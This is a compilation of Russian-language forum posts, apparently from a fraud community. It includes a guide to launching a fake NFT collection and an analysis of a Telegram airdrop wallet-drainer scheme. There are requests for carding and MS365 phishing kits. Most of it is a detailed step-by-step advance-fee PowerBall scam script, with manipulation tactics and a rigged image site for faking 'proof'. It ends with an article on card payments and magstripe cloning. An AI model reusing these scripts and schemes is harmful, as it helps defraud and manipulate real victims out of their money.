MaxSupply - максимальное колличество ваших NFT
cost - Цена за 1 НФТ
MaxMinAmountPerTX - Колличество возможных покупок за 1 транзакцию
Public Paused - Если хотите выбрать определенное время запуска минта, то пишем
True, если нет то False
После настроек снова компилируем смарт контракт
Переходим в Деплой смарт контракта, внизу выбираем наш контракт, сверху
выбираем Injected Web3 и жмём Deploy, платим комиссию за деплой.(Важный
момент! С какого кошелька вы развернули контракт - он становится овнером)
Дожидаемся транзакции и после чего переходим на Etherscan в свой кошелек и
видим, что развернулся смарт контракт
Переходим к нему и верифицируем его на том же Etherscan.
После успешно пройденной верификации мы возвращаемся к контракту(на том же
Etherscan) и переходим в работу с функциями(Вкладка Contract > Write Contract)
Во второй вкладке возвращаемся в пинату и копируем значение Json файлов и
вставляем в 13 строку редакции контракта(setUriPrefix) после написанного нами
ipfs://
И жмём кнопочку write
На этом создание нашей коллекции заканчивается, но это не всё и пора
приступать к созданию сайта для минта))
С минтом сделаю как и с генерацией, не знаю зачем обьяснять то, что есть в
общем доступе
[Вот соурс код с манаулом(клик)](https://github.com/The-Stripes-NFT/nft-
minting-app)
**Как бы, вот основа для создания фейк нфт-коллекции, а как развивать ход
событий - все в ваших руках. Как я и говорил ранее, вы можете попробовать
добиться коллаба с какой-либо НФТ коллекцией, что даст вам большой рывок
вперед. Можете открыть дискорд-канал, телеграм группу, закупать рекламу на
разных маркетплейсах и чем больше вы себя зарекомендуете - тем больше
профита
Конкретно в чём участвовал - сказать не могу, но скажу так, эти ребятки, кому
я все разрабатывал - сделали сотни тысяч $.
Удачи в начинаниях!**
Новая статьи и взята снова с канала @burnout_dev (Не реклама)
Я очень люблю анализировать разные схемы, которые попадаюстя мне на глаза и разбирать, как люди это релизовали.
Так вот общался я со знакомым спамером по тг в начале лета, спрашивал куда он вообще спамит и кому, мы с ним уже общались на тот момент месяца два и тут он мне говорит, ну есть один "амер" я ему лью каждый день почти с нового года, он платит мне 10-15к рублей в день и мы работаем.
Я сразу понял, что тут что-то интересное.
Мне стало любопытно, как они шлют, спамер говорит, ну амер кидает проект крипто какой-то я собирают с него аудиторию и начинаю инвайтить в 10 групп нулевок, аудиторию проекта.
Присылает мне примеры и тут я уже начинаю разбирать детально подход этого "амера".
Группы нулевки выглядят, как оригинал, только с вставкой, что это аридроп
это оригинал
фейк
фейк
фейк
фейк
Там еще групп 5 под этот проект, но суть везде одна и так же. Спамер инвайтит в эти группы людей собранных из оригинальной, по 1к человек в каждую нулевку, когда хомяка заинвайтили, там в группе вылетает привественное сообщение, с упоминанием человека и текстом и линком на фейк ленд, для получения аирдропа
После того как наинвайтил 1к человек в группе начинает поститься сообщение автоматическое, что у нас идет аирдроп, каждые мин 10, тут у него в разных группах было по разному, где то каждые 30 минут, где то каждый час, где-то каждые 5 минут.
Тестировал походу как лучше.
Сообщение выглядит так
Я перешел по домену, законнектил пустой кош и нашел его кошелек.
0x924CD613428F170E34491B86E7F8B3560eFCfe16
Вот он
Можно следить за ним. В эфир сети у него около 300к в бнб сети около 800к.
Видели бы вы реакцию спамера, когда я показал ему, сколько амер с ним заработал)) Там столько ора было, что он за 3 копейки делает, а чел тут кучу денег получает)))
Схема простая же. Как он насобирал то больше миллиона?
А суть в том, что он делает на потоке, проекты без остановки. Спамер сказал в день бывает по 5 проектов. Разные берет и мелкие и большие.
оригинал
фейк
оригинал
фейк
Важные моменты, которые я увидел!
Поток позволяет ему закрыть расходы спамера на инвайтинг. Потому что на дистанции он получает гораздо больше. Спамер стоит 10-15к рублей в месяц это условно ~5к баксов месяц.
А доход его по кошу можете просмотреть, по токенам, которые драйнятся.
У меня все, всем спасибо.
Приветствую, сам недавно занимаюсь крд,вещевухой, понемногу получается, но в последнее время часто вижу такие темы как обнал через какие то приватные мерчи. Знаю что такое мерч, не могу понять как именно работает такой обнал и какой мат для него нужен. Если есть какие то мануалы или информация об этом, буду очень благодарен если скинете.
Ищу чаты по кардингу, новички/опытные - неважно, главное чтоб не было спама бесполезной рекламой
You must have at least 50 reaction(s) to view the content.
«Я никогда не смогу убедить другого,
иначе как с помощью его
собственных мыслей».
(И.Кант)
**Содержание:
1. Раскладываем приманку.
2. Папина лазейка.
3. Совпало!
4. Тираж.
5. Форс-мажор.
Этап 1. Раскладываем приманку.**
Используя платные или бесплатные источники трафика, распространяем следующее
объявление:
«Расскажу как вернуть деньги за лотерейные билеты PowerBall, купленные с
марта 2019 г. по настоящее время. Пишите
наJohn@insidero.io»
На John@insidero.io настраиваем автоответчик, чтобы
каждый новый отправитель (first-time sender) единоразово получал следующее
сообщение:
«Я вижу ваше письмо. Сейчас я за рулём. Буду дома через час. Кое-что
проверю и сразу вам напишу. Ваш Jonh W.»
Этап 1 завершён.
**СИ-фишки и их обоснование.
Фишка 1. Слово, которое нельзя произносить.**
Я ни разу не произнёс слово «Джекпот». Так как на первом этапе это слово будет
расценено ЦА как «маркер очередного скама».
Похожий пример:
Рассказывать девушке, на 2-й минуте первого свидания, как вы будете её сладко
«трах-трах» это плохая идея. Но если немного подождать — она сама на вас
вскочит.
Фишка 2. Мыло со смыслом.
Контактный Email — на собственном домене. Выгоды такого решения:
а) Короткое имя John@, а не монстр вроде johnwilliams2233@, вызывает уважение
в Интернет трафике, как короткий автомобильный номерной знак вызывает уважение
на дороге.
б) Домен @insidero.io намекает ЦА, что John «имеет доступ к закрытой информации». Такой намёк был бы невозможен с безликими @gmail, @hotmail, yahoo.
Фишка 3. Текст объявления.
Слишком идеальное «торговое предложение» запускает у ЦА «режим скептика» и как
следствие вопрос «В чём подвох?».
Поэтому, я умышленно добавил в текст объявления «изъян» в виде ограничения по
дате (с марта 2019 г. по настоящее время).
Похожий пример:
За одной фразой спрятан бот, а за другой живой человек.
Фраза 1: Звоните в любое время.
Фраза 2 : Звоните с 11 до 20 часов, в выходные до 22.
«Изъян» в виде ограничения по времени «очеловечил» вторую фразу.
Фишка 4. Текст автоответчика.
В автоответчике я использовал 3 СИ-приёма:
а) В тексте не банальная отписка, а микро-история (Сейчас я за рулём. Буду
дома через час. Кое-что проверю), за которой ЦА чувствует живого человека, а
не робота.
б) Моментальность ответа внушает ЦА мысль, что «John на связи и сразу отвечает».
Похожий пример:
Сравните две ситуации.
Ситуация 1.
Вы увидели объявление о продаже автомобиля. Вы звоните по номеру. Гудки идут.
Вы ждёте. Ждёте ещё. Трубку никто не берёт. Вы нажимаете кнопку «завершить
вызов».
Даже если продавец перезвонит вам через 10 минут, первое впечатление о нём уже
испорчено. Вы сами прокрутили в своей голове кучу причин «почему он не
ответил». И почти все причины были негативными.
Ситуация 2.
Вы звоните. Продавец берёт трубку после первого гудка. Он вежливо шёпотом
переносит разговор на час, так прямо сейчас его сыну будут вручать
государственную награду.
И в первом, и во втором случае — «разговор не состоялся». Но для ЦА имеет
большое значение «как именно».
в) Фактически я говорю ЦА: «Нет. Сейчас говорить не могу». Это мощная СИ- фишка, повышающая траст. Этой теме посвящены целые книги.
Фишка 5. Интрига.
В автоответ я добавил интригу: «Кое-что проверю ». Интрига будет раскрыта
на следующем этапе и у ЦА «сложится пазл».
Этап 2. Папина лазейка.
На 15 минут раньше, чем обещали, отправляем письмо:
Приветствую. Я дома. Не буду скрывать, я проверил ваш Email на spokeo.com — вы
не работник PowerBall, не журналист или представитель любой другой профессии,
которая стала бы препятствием в нашем общении.
Это хорошо. Значит я могу быть с вами достаточно откровенным.
Я начну с короткого пояснения, а затем перейду к механизму возврата денег.
Лотерея это бизнес. Она получает прибыль, продавая билеты. И она терпит
убытки, выплачивая выигрыши. Другими словами, лотерея заинтересована в вашем
проигрыше.
Уверен вы это понимали и без меня, я просто уточнил.
Теперь представьте — вы купили билет PowerBall и отметили в нём номера: 10,
22, 34, 48, 55 и 8
Чтобы вы проиграли — должны выпасть любые номера, кроме ваших. Но, если
лотерейная машина выбирает номера случайным образом, то ваш проигрыш не
гарантирован.
Другими словами, прибыль лотереи зависит от удачи. Понравилось бы такое
хозяевам лотереи? Разумеется нет.
Поэтому, всё устроено по-другому.
Когда вы покупаете лотерейный билет в магазине, кассовый терминал связывается
с PowerBall и сообщает: место, дату и время покупки билета, а главное —
номера, которые вы выбрали.
При покупке билета в Интернете происходит то же самое.
Таким образом, у PowerBall имеется база данных «всех проданных билетов».
Официальное объяснение вполне разумное: «Если некий мошенник подделает
лотерейный билет, то PowerBall легко это обнаружит, так как поддельного билета
не будет в базе».
Однако, если PowerBall знает все номера во всех билетах до начала тиража — то
возникает великий соблазн «обыграть» подавляющее число участников этого
тиража.
Это можно сравнить с игрой в покер, где каждый участник добровольно показывают
вам свои карты.
Вы бы воспользовались таким преимуществом? Ответ очевиден.
Но у хозяев PowerBall возникает проблема. Это время. Объясню.
В примере с одним билетом обыграть вас предельно просто — должны выпасть любые
номера, но не ваши.
Однако в реальном тираже участвует не один, а сотни тысяч билетов с миллионами
комбинаций номеров. Обыграть их всех невозможно.
Но можно найти такие номера, которые если бы стали выигрышными, повлекли
минимальные расходы на оплату выигрышей.
Или говоря проще, можно найти «самые выгодные выигрышные номера для данного
тиража».
А чтобы их найти, требуется время.
И теперь вам должно стать понятно, почему PowerBall останавливает продажу
билетов за 59 минут до начала тиража (The official cutoff for ticket sales is
10:00 p.m. Eastern Time).
Это время требуется компьютерам PowerBall для анализа «базы данных всех
проданных билетов» и поиска «самых выгодных номеров».
Когда «выгодные номера» найдены, их сообщают двум лотерейным машинам по
зашифрованной беспроводной сети.
Начинается тираж и лотерейные машины, виртуозные как Пенн и Теллер (Penn &
Teller), всегда выбирают «правильные» шары.
Мой отец рассказывал, что внутри каждого шара размещены 6 электромагнитов,
электронная плата, аккумулятор и антенна.
Подаётся команда и шары с «правильными» номерами поочерёдно притягиваются к
центру, где их подхватывает манипулятор.
А все остальные шары наоборот отталкиваются от центра.
Я не знаю, правда это или нет, так как кроме слов отца у меня нет других
доказательств.
Но если это правда, то я «снимаю шляпу» перед инженерами PowerBall. Это
гениально. Я бы до такого не додумался.
Вы можете спросить: «Постой, Джон. Как тогда люди выигрывают Джекпот? Или это
фейк?».
Нет, Джекпот это не фейк. Если вы хорошо подумаете, то согласитесь, что
PowerBall выгодно отдавать Джекпоты обычным людям.
Иначе, люди решат, что PowerBall перестала быть «счастливой лотереей» и
понесут свои денежки конкурентам.
А это конец бизнеса. Поэтому, в PowerBall минимизируют все выигрыши, кроме
Джекпотов.
И тут мы подошли к самому важному.
Человек, который разрабатывал, тестировал и внедрял математические алгоритмы,
которые по сегодняшний день использует PowerBall для поиска «выгодных
номеров», был мой отец.
Отец успел рассказать мне о «лазейке», которую он оставил на чёрный день. Это
«лазейка» позволяет выиграть Джекпот в любом тираже.
Для этого нужно купить билет PowerBall и отметить в нём 10 вариантов (10
lines) определённым образом.
Какой вариант станет выигрышным, заранее не известно. Но если все 10 вариантов
находятся у вас в билете, это не важно.
Разумеется, каждый новый тираж эти 10 вариантов будут новые. Старые варианты
для новых тиражей не годятся.
Да-да, знаю, это звучит как скам.
Поэтому, чтобы тень подозрений не падала на доброе имя моего отца, я прикрепил
к письму доказательство:
это фотография 10 вариантов, один из которых выиграет Джекпот в тираже
PowerBall в среду 20 July 2022.
Должен вас предупредить. Мне пришлось «зашифровать» фотографию на сайте
PhotoBlender.org , чтобы вы спокойно проверили, а не побежали покупать
билеты (это мы обсудим это позже).
Как работает сайт PhotoBlender?
Вы загружаете любую картинку. Нажимаете Blend. Сайт разрезает вашу картинку,
перемешивает, а затем склеивает её.
К каждой картинке сайт выдаёт recovery code, с помощью которого вы можете
вернуть картинку в первоначальный вид.
В среду 20 July 2022, примерно в полночь, я пришлю вам recovery code.
Вы загрузите прикреплённую фотографию на PhotoBlender, введёте recovery code и
скачаете первоначальное изображение.
Когда вы откроете первоначальное изображение, то удивитесь: «Что это? Где
номера для 10 вариантов?».
Не волнуйтесь. Я замаскировал 10 вариантов так, чтобы они стали похожи на
ответы по математике.
Дело в том, что я допускаю, что администратор сайта PhotoBlender может
просматривать некоторые загруженные фотографии.
А значит с моей стороны было бы глупо закачивать на чужой сайт
конфиденциальную информацию без предварительной маскировки.
Теперь же любой посторонний взгляд будет «сбит с толку», а вы без труда
прочитаете все 10 вариантов.
Кстати, вас не удивляет, как я напечатал такой длинный текст, если я только что приехал домой?
На самом деле, это письмо я написал в марте 2019 года. А сегодня лишь приложил
к нему 10 вариантов для проверки.
Зайдите на эту страницу https://powerball.com/winner-stories/jackpot/
Шесть человек из этого списка выиграли Джекпот благодаря «папиной лазейке».
Они получили Джекпот, оплатили все налоги и 85% оставшихся денег отправили
мне. Это было моё условие.
Они заработали от 2 до 6 миллионов просто за то, что съездили и забрали
Джекпот.
Уверяю вас, это самая высокооплачиваемая работа курьера в истории США.
Итак, только что у вас появилась возможность не только возместить все
деньги, потраченные на билеты PowerBall ,
но и получить несколько миллионов моральной компенсации за их многолетнее
жульничество.
А учитывая, что сами хозяева не против отдать Джекпот, было бы глупо этим не
воспользоваться!
Мне нужно уезжать, поэтому я заканчиваю.
Ожидайте моё письмо в среду 20 July 2022.
Ваш Jonh W.
**Этап 2 завершён.
СИ-фишки и их обоснование.
Фишка** 6. Скорострел.
Письмо я отправил на 15 минут раньше, чем обещал (обещал через час, а отправил
через 45 минут).
Когда ЦА получает раньше чем ждала, или больше чем ждала — это всегда повышает
траст.
Похожие примеры:
а) Вы ждали посылку через 30 дней, а она пришла за 20. Приятно было получить
раньше , чем ожидали? Продавец вызвал доверие?
б) Вы покупали на рынке орехи, а вам пол стаканчика сверху бесплатно. Приятно
было получить больше , чем ожидали? Продавец вызвал доверие?
Фишка 7. Собеседование.
Фраза «я проверил ваш Email на spokeo» говорит ЦА, что она только что прошла
проверку для доступа к информации, которая «не для всех».
Это как пройти собеседование или проникнуть на «закрытую вечеринку».
Этим я и траст повысил и заинтриговал.
Фишка 8. Жулик не воруй.
В текст письма я умышленно вставил слова «мошенник», «подделает»,
«жульничество», «обыграть», «скам».
У ЦА есть убеждение, что мошенники как чёрт ладана боятся подобных слов. Это
часто обыгрывается в фильмах.
Например, в сериале Виртуозы (2004—2012) есть эпизод, где Эш Морган по кличке
«Три носка» выпивает сыворотку правды и разбалтывает жертве,
что он «мошенник и будет его сейчас обманывать». Жертва смеётся и в полной
уверенности, что мошенник такого сказать не мог, заключает сделку.
Фишка 9. Ставки сделаны, ставок больше нет.
Я взял общеизвестный факт (остановка продажи билетов за 59 минут до начала
тиража) и наполнил его выгодным мне смыслом,
который хорошо ложится на убеждения ЦА о том, что богачи наживаются на простых
людях.
Фишка 10. Урок физики.
Я дал простое и понятное объяснение, на уровне средней школы, как можно,
используя свойства магнетизма, манипулировать шарами.
Фишка 11. Когда неуверенность к месту.
Я умышленно добавил в текст «изъян» в виде неуверенности (я не знаю, правда
это или нет, так как кроме слов отца у меня нет других доказательств).
Эта фраза запускает в голове ЦА логическую цепочку «значит во всём остальном
он уверен».
Фишка 12. Признание чужой гениальности.
Фраза « снимаю шляпу перед инженерами PowerBall, это гениально » опять же
повышает доверие к нам. Долго объяснять, целые книги на эту тему написаны.
Если очень коротко: признание чужих достижений — признак высокого ранга
(низкий ранг в 99% не восхищается кем-либо, а наоборот поливает грязью).
Соответственно, с кем ЦА хотела бы иметь дела?
Разумеется, с высокоранговым представителем рода человеческого.
А фраза «я бы до такого не додумался» — говорит ЦА, что мы не такие
«изобретательные», как эти жулики, а значит и подвоха от нас ждать не стоит.
Фишка 13. Спокойствие, главное — спокойствие.
Я дал логическое обоснование, что для PowerBall выгодно отдать главный приз.
Тем самым, я вселил в ЦА уверенность, что проблем с получением Джекпота не
будет.
Фишка 14. Гений.
Я ввёл в сюжет 3-е лицо. Это мёртвый отец.
Выгоды:
а) Я избавился от всех вопросов математического и технического плана. Вы
просто говорите: «Все вопросы к папе. Свечи для спиритических сеансов в лавке
за углом».
б) Мёртвый отец запускает у ЦА либо сочувствие (мне жаль), либо социальную
идентичность (мой тоже умер). И то и другое повышает траст.
Фишка 15. Какие ваши доказательства?
Сразу же, в первом письме (автоответчик не в счёт), я прикрепил доказательство
(фотографию).
Тем самым, я поставил ЦА в ситуацию, в которой было бы глупо не проверить,
пусть даже для начала в шутку.
Фишка 16. Маскировка.
Чтобы развеять возможные мысли ЦА о моей принадлежности к сайту ImageBlender,
я придумал маскировку (под ответы по математике).
Для ЦА такое усложнение — это явный маркер того, что сайт ImageBlender нам не
принадлежит.
Фишка 17. Друг на друга не похожи.
Домены первого уровня в контактном Email (.io) и сайте ImageBlender (.org) я
сделал разные, чтобы не давать ЦА повод для «вредных» мыслей.
Фишка 18. Тайный список.
Каждый человек хочет эксклюзивный продукт, но не хочет быть первым, кто будет
его тестировать.
Поэтому, я говорю ЦА: «Не бойся, до тебя уже 6 человек проверили, всё
работает» (Шесть человек из этого списка выиграли Джекпот).
Фишка 19. Жадный Я.
Я сообщил ЦА, что забираю 85% выигрыша себе. Для ЦА это «маркер правды».
ЦА думает так: «Мошенник не стал бы озвучивать процент, от которого глаза на
лоб лезут. Мошенник предложил бы 50/50 или вроде того, чтобы я точно не
соскочил с крючка.
Такой высокий процент могут озвучивать только, если предстоит делить что-то
реально ценное».
Фишка 20. Первый из шести?
Я сообщаю ЦА, что написал письмо в «марте 2019 года». Если ЦА полезет
проверять, то на странице
[https://powerball.com/winner-
stories/jackpot/?page=%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C1](https://powerball.com/winner-
stories/jackpot/?page=%2C%2C%2C%2C%2C%2C%2C%2C%2C%2C1)
он обнаружит следующее:
**
Логика работы сайта ImageBlender.**
Я не кодер, поэтому объясняю как могу.
Регистрируем сайт. Варианты имён:
ImageBlender, ImageMixer, PhotoBlender, PhotoMixer, ImagePuzzle, PhotoPuzzle.
На сайте устанавливаем скрипт, который из любого изображения делает нечто похожее.
Логика скрипта.
1. Загружаем картинку DSC0100.JPG
2. Скрипт снимает с картинки контрольную сумму crc32 и проверяет, есть ли
запись с таким значением в базе данных.
Если есть — скрипт использует существующую запись.
Если нет, то скрипт создаёт папку с именем равным crc32 картинки и копирует в
эту папку картинку.
После этого, скрипт «кромсает» исходную картинку. В это время пользователю
показывают прогресс-бар в течение 5 секунд.
Скрипт снимает с полученной картинки контрольную сумму crc32, создаёт папку с
таким именем и копирует картинку туда.
Скрипт помещает полученную картинку о временную папку откуда пользователь её
скачивает с новым именем: ImageBlender_DSC0100.JPG.
Скрипт генерирует рандомный 4-х буквенный recovery code и показывает его
пользователю.
Скрипт делает запись в базу данных:
date: 23.07.2022
time: 16:21:19
url: /dc44ca92/DSC0108.JPG
recovery code: UEMK
blended url: /18e360e7/ImageBlender_DSC0100.JPG
Как работает восстановление картинки.
Пользователь загружает ImageBlender_DSC0100.JPG и вводит recovery code.
Скрипт снимает с картинки контрольную сумму crc32 и проверяет, есть ли запись
с таким значением в базе данных (запись blended url).
Затем скрипт проверяет валидность recovery code (запись recovery code).
В случае успеха, скрипт показывает пользователю прогресс-бар в течение 25
секунд, а затем копирует исходную картинку из хранилища (запись blended
url) во временную папку,
откуда пользователь скачивает её с именем: DSC0100.JPG.
Как работает подмена.
Для того, чтобы прикрепить к письму доказательство, мы делаем фотографию 10
рандомных вариантов номеров.
Идём на сайт ImageBlender и «разрезаем» фотографию. Полученное фото
прикрепляем к письму и отправляем ЦА.
Когда тираж состоялся и нам стали известны выигрышные номера, мы «фотошопим»
одну из десяти строк правильными номерами.
Затем снимаем с фото контрольную сумму (dc44ca92).
На сайте ImageBlender совершаем подмену:
а) Заменяем фото DSC0108.JPG фотошоп-версией.
б) Переименовываем папку с фотошоп-версией на dc44ca92,
в) В базе данных, в строке url меняем имя папки на dc44ca92.
Теперь, даже если ЦА начнёт перепроверять (загрузит расшифрованную картинку на ImageBlender и опять зашифрует), то получит ту же картинку, которую мы прислали до начала тиража.
**СИ-фишки и их обоснование.
Фишка 21. Куски идентичны.**
Хорошо, чтобы в ImageBlender_DSC0100.JPG были видны куски первоначального
изображения с цифрами некоторых комбинаций.
ЦА зацепится за эти «доказательства». А когда получит первоначальную картинку
— то будет искать и найдёт эти куски.
Соответственно, подменять мы будет один из 10 вариантов, который «порезало в
хлам», чтобы ЦА не смог проверить этот вариант путём сопоставления.
Фишка 22. Маркеры дня.
Идеально сделать так: распечатать лист с номерами и сфотографировать его днём,
по аналогии с фотографией ниже.
На этой фотографии присутствуют «маркеры дня» — солнечные блики.
Они будут убеждать ЦА, что фото сделано днём, а не ночью после завершения
тиража. Обычный скан таким трастом не обладает.
Другие возможные «маркеры дня»: окно за которым ясный день, стеклянный предмет
в котором отражается дневное солнце.
Фишка 23. Клеить всегда дольше.
Я умышленно сделал прогресс-бар в 5 секунд, когда идёт «нарезка» изображения,
и 25 секунд, когда изображение возвращается к исходному виду.
Это хорошо ложится на логику «легко нарезать — но трудно склеить».
Этап 3. Совпало!
На 15 минут раньше, чем обещали (в 23:45), отправляем письмо:
Приветствую. Я только приехал домой. На столе бардак, так как моя кошка каким-
то чудом открыла дверь и забралась на стол.
Мне пришлось потратить время, чтобы найти лист на котором я записал recovery
code.
Да-да, знаю, можно было сохранить запись в ноутбуке, но мой физиотерапевт
рекомендовал мне как можно больше писать «от руки». А я привык доверять
докторам.
Итак, recovery code: UEMK
Заходите на PhotoBlender.org. Закачивайте фото, которое я прислал вам ранее.
Вводите recovery code.
Скачивайте изначальное фото и проверяйте — какой из 10 вариантов стал
выигрышным.
Напоминаю, что фото замаскировано от «посторонних глаз».
Я не вижу смысла делать ещё одну проверку, так как «папина лазейка» это
математика комплексных чисел.
А в математике 2+2 всегда = 4, сколько не проверяй.
Я полагаю, глупо спрашивать «согласны ли вы выиграть Джекпот в следующем
тираже?». Ваш ответ Да.
Но прежде чем я сообщу вам какими 10 комбинациями заполнить билет для
следующего тиража, я хочу спросить вас.
Какова вероятность, что вы отправите мне 85% выигрыша?
Да, такую гарантию дать сложно. Поэтому, чтобы показать вашу готовность идти
до конца, я предлагаю вам сделать посильный тестовый платёж.
Разумеется, это не даст мне гарантию, что вы так же легко и без вопросов
отправите мне 85% выигрыша.
Но как говорил мой отец «лучше иметь дело с человеком, который внёс задаток за
твою честную работу, чем иметь дело с человеком, который от этого отказался».
Все 6 человек, с которыми я работал, вносили посильный тестовый платёж в
размере аренды жилья за 1 месяц.
Это были разные суммы. Никаких подтверждающих документов я не требовал. Потому
что, для меня была важна не сумма, а сам факт перевода.
Со своей стороны, я тоже хочу побудить вас к выполнению всех договорённостей
до конца. Что я имею в виду?
Если всё пройдёт гладко, я буду 1 раз в месяц присылать вам информацию с
закрытого клуба инвесторов, в котором я плачу ежегодный членский взнос в $1
миллион.
Благодаря этой информации, вы сможете приумножить ваш выигрыш в 10 и более
раз.
По-секрету скажу, что один из инсайдеров клуба — человек из правительства.
Инструкцию для тестового платежа я прикрепил к письму.
Внимание! Сохраните её, так как мои % вы будете переводить частями по этим же
реквизитам.
Следующий тираж через 2 дня — в субботу.
Как только тестовый платёж придёт, я отправлю вам 10 комбинаций для субботнего
тиража.
Моя двойная гарантия:
1. Если Я допущу ошибку (маловероятно, но было бы ложью утверждать, что вероятность такого события равна нулю), я верну ваш тестовый перевод + $20 за билет + $2000 моральной компенсации.
2. Если ВЫ допустите ошибку (например перепутаете номер в варианте, который
станет выигрышным), я верну ваш тестовый перевод, но при условии,
что Джекот в этом тираже не будет выигран. Извините, но мне будет крайне
трудно поверить, что его выиграли не вы.
На этом сегодня всё.
Дайте знать, когда сделаете перевод.
Ваш Jonh W.
**Этап 3 завершён.
СИ-фишки и их обоснование.
Фишка 24. Кошка.**
История с кошкой и физиотерапевтом добавляет траста, так как, повторюсь, ЦА
важно чувствовать живого человека по ту сторону экрана.
Фишка 25. Вам можно доверять?
В тексте я умышленно ставлю вопрос (Какова вероятность, что вы отправите мне
85% выигрыша?), чтобы ЦА поняла, что моё доверие нужно заслужить.
Фишка 26. Клуб инвесторов.
Перед объявлением того, как именно ЦА должна заслужить моё доверие, я делаю
«прогрев».
Я говорю, что на Джекпоте ничего не заканчивается, мы продолжим общение и
будет приумножать наши $$$.
Это мощный «маркер правды» для ЦА.
Фишка 27. Папа сказал.
Я нарочно делаю вид, что сумма перевода не важна. А необходимость перевода
подкрепляю словами «умершего отца» — с такими доводами уже невозможно спорить.
В то же время сумма перевода вполне определённая — ЦА понимает, что 500 баксов
не прокатят.
Фишка 28. Инструкция.
Фраза « сохраните её, так как мои % вы будете переводить частями по этим же
реквизитам » — тоже бустит траст.
Во-первых, я акцентирую внимание ЦА, что для меня самое важное, это мои 85%, а
значит я уверен, что Джекпот будет получен.
Во-вторых, слово «частями» говорит ЦА, что сумма будет действительно большая и
перевести её за один раз не получится.
Фишка 29. Гарантия.
Максимально честная и логически выверенная двойная гарантия даёт ЦА
уверенность, что «всё под контролем».
ЦА делает тестовый перевод. И на этом можно было закончить. Но я люблю другие «развязки».
Этап 4. Тираж.
Мы получили денежный перевод, а значит отправляем следующее письмо.
Приветствую. Я получил ваш перевод и выполняю свою часть договорённостей:
10 комбинаций для субботнего тиража прикреплены к письму. Распечатайте их.
Купите билет и отметьте все 10 вариантов.
Затем сожгите лист, соблюдая правила пожарной безопасности.
Когда тираж завершится, я напишу вам.
Мы обсудим дальнейшие действия.
До связи.
Ваш Jonh W.
**Этап 4 завершён.
СИ-фишки и их обоснование.
Фишка 30. После прочтения сжечь.**
Просьба сжечь распечатанный лист убеждает ЦА, что я прислал не «рандомные
номера». И в целом, наличие 4-го этапа, говорит ЦА, что мы не мошенники.
Этап 5. Форс-мажор.
За 1 час до начала тиража, делаем возврат $20. Затем пишем следующее письмо.
Форс-мажор!
«Папина лазейка» обнаружена и удалена.
Выигрыша не будет.
Я успел вернуть только $20 за билет, после чего все кошельки заблокировали.
Не знаю, дойдёт ли дело до полиции.
Как только он всё уляжется, я выполню все свои обязательства в полном объёме.
Я уезжаю, так как через пол часа у меня встреча с адвокатом.
Будьте на связи.
Ваш Jonh W.
**Этап 5 завершён.
СИ-фишки и их обоснование.
Фишка 31. Что это было?**
У ЦА разрыв шаблона — если это был мошенник, зачем было присылать номера?
Более того, зачем было возвращать $20? Это лишено всякого смысла!
Таким образом, за $20 я вызвал у ЦА пусть и не «Стокгольмский синдром», но
что-то очень похожее.
На практике, подобный «финт ушами» позволяет схемам не умирать очень долгое
время.
Кто подскажет, где можно взять/приобрести годный кит с фишингом ms365?
В твоем кошельке наверняка есть несколько карт международных платежных систем, таких как Visa или MasterCard. Задумывался ли ты, какие алгоритмы используются в этих картах? Насколько платежи безопасны? Мы расплачиваемся картами каждый день, но достоверно знаем о них крайне мало. Еще больше мифов сопровождает карточные платежи. Чтобы понять, какие есть способы похитить деньги с карты, нужно сначала уяснить, как происходит оплата. Давай разбираться вместе.
Оплата по номеру карты исторически — самая старшая. Раньше на картах не было ничего, кроме этого номера. Номер был «эмбоссирован» — выдавлен на карте. При оплате карта «прокатывалась» на специальном устройстве, что позволяло продавцу быстро внести номер в древнюю замену базы данных, то есть отпечатать на листе бумаги.
В конце рабочего дня или недели эти данные собирались и передавались в банк‑эквайер. Далее банк отправлял запросы на списание этих денег у владельцев карт через банки‑эмитенты. Это было так давно, что немного людей знают, откуда появился трехзначный код верификации платежей, записанный на обратной стороне карты, так называемый CVV2/CVC2. До нас дошла информация, что этот код использовался скорее как контрольная сумма, нужная, чтобы владелец карты не ошибся и корректно ввел всю информацию при оплате. Похоже на правду, если учесть, насколько короткий этот код.
Сейчас физическая карта может и вовсе не участвовать в оплате. Это называется card not present и чаще всего используется при оплате в интернете. Если номер карты вводится при оплате в платежном терминале, а это характерно для отелей, бизнесов, ведущих дела по телефону, а также для большинства терминалов в США, такой подтип платежей называется PAN Key Entry.
Многие до сих пор считают, что поле Cardholder name с лицевой стороны карты нужно вводить корректно и что оно проверяется. Это не так — ни один банк не проверяет это поле.
Операции с магнитной полосой — один из самых простых методов. Он ассоциируется у людей с определенными типами мошенничества. Скимминг в банкоматах, двойные снятия в ресторанах — все это возможно благодаря недостаткам магнитной полосы. Магнитную полосу легко скопировать — для этого необходим только специальный ридер/энкодер магнитной полосы. Дальше клонированной магнитной полосы достаточно для того, чтобы расплачиваться в большинстве супермаркетов мира. Для верификации владельца карты предполагалось использовать подпись на чеке, которую кассир должен сверить с подписью на обратной стороне карты.
![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu-
central-1.amazonaws.com%2F0d172265ccd0603c088afc6010f40ab7%2F17600%2Fimage1.jpg&hash=ca8972d1cb72552a8c58252e82acde87)
На картинке выше ты видишь пример записанной на карту информации. Черные
полоски — это единицы, белые — нули. Существуют open source решения для
декодирования этих данных — к примеру,
magstripe.
На самом деле по изображению видно, что на карте не одна, а целых две магнитные полосы разной плотности (Track1 и Track2). Какие данные содержатся на магнитной полосе?
На смену магнитной полосе в девяностых пришли смарт‑карты, для популяризации которых создали консорциум EMV (Europay, MasterCard, Visa). Продвигаемая консорциумом идея была проста: используя особенности смарт‑карт, симметричную криптографию и криптографию с открытым ключом, решить все проблемы, связанные с магнитной полосой. Операции со смарт‑картой обеспечивают три степени защиты:
Давай пройдемся по используемым методам.
Для аутентификации карты используется криптография с открытым ключом по протоколу RSA. Текущие минимальные требования по длине ключа — 1024 бита. Ограниченное число центров сертификации выпускают ключи для банков, а банки их уже привязывают к самим картам. Приватный ключ хранится на самой смарт‑карте в области, недоступной для чтения. Корневые сертификаты устанавливаются на терминал при его настройке. Во время транзакции карта предоставляет публичные ключи платежному терминалу вместе с информацией, зашифрованной приватным ключом в режиме цифровой подписи. Если публичный ключ доверенный и информация, переданная картой, успешно расшифровывается этим ключом, то терминал считает карту аутентичной, выпущенной именно тем банком, который подписал приватный ключ, выданный центром сертификации.
Всего существует три режима аутентификации карты:
